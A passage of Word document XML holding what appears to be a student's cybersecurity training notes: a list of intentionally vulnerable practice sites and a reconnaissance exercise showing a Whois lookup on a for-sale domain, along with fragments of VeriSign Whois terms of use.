      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> status codes, please visit https://icann.org/epp</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NOTICE: The expiration date displayed in this record is the date the</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registrar's sponsorship of the domain name registration in the registry is</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currently set to expire. This date does not necessarily reflect the expiration</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date of the domain name registrant's agreement with the sponsoring</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 xml:space="preserve">registrar. Users may consult the sponsoring registrar's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> database to</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view the registrar's reported date of expiration for this registration.</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 xml:space="preserve">TERMS OF USE: You are not authorized to access or query our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</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database through the use of electronic processes that are high-volume and</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automated except as reasonably necessary to register domain names or</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modify existing registrations; the Data in VeriSign Global Registry</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 xml:space="preserve">Services' ("VeriSign") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> database is provided by VeriSign for</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information purposes only, and to assist persons in obtaining information</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about or related to a domain name registration record. VeriSign does not</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 xml:space="preserve">guarantee its accuracy. By submitting a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> query, you agree to abide</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by the following terms of use: You agree that you may use this Data only</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for lawful purposes and that under no circumstances will you use this Data</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to: (1) allow, enable, or otherwise support the transmission of mass</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unsolicited, commercial advertising or solicitations via e-mail, telephone,</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or facsimile; or (2) enable high volume, automated, electronic processes</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that apply to VeriSign (or its computer systems). The compilation,</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repackaging, dissemination or other use of this Data is expressly</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prohibited without the prior written consent of VeriSign. You agree not to</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use electronic processes that are automated and high-volume to access or</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 xml:space="preserve">query the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> database except as reasonably necessary to register</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domain names or modify existing registrations. VeriSign reserves the right</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 xml:space="preserve">to restrict your access to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> database in its sole discretion to ensure</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operational stability. VeriSign may restrict or terminate your access to the</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Whois</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> database for failure to abide by these terms of use. VeriSign</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reserves the right to modify these terms at any time.</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The Registry database contains ONLY .COM, .NET, .EDU domains and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:bidi="te-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Registrars.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Day-1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Task -2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding vulnerable sites </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>First open a browser the search vulnerable websites.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step -2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Some sites will be shown </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step -3 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable sites </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt; CTFlearn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt; bWAPP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt; Google Gruyere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; Hellbound Hackers </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt; OWASP Multilidae ||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt; HackThis!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>DAY -2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Foot printing and reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-1 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for domain name </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">I took </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>https://marketplace.appsmart.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Osint frame work </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Step-3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain name - who is records - Domain tools whois </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-4 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste the domain name </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-5 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">I got results of this site </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-6 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Domain Admin / This Domain is For Sale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Org HugeDomains.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrant Country US</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar TurnCommerce, Inc. DBA NameBright.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IANA ID: 1441</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>URL: http://www.NameBright.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Whois Server: whois.NameBright.com(p)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Registrar Status clientTransferProhibited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Dates 4,250 days old</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Created on 2011-11-21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Expires on 2025-11-21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Updated on 2020-11-15   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Name Servers NSG1.NAMEBRIGHTDNS.COM (has 4,700,935 domains)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>NSG2.NAMEBRIGHTDNS.COM (has 4,700,935 domains)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
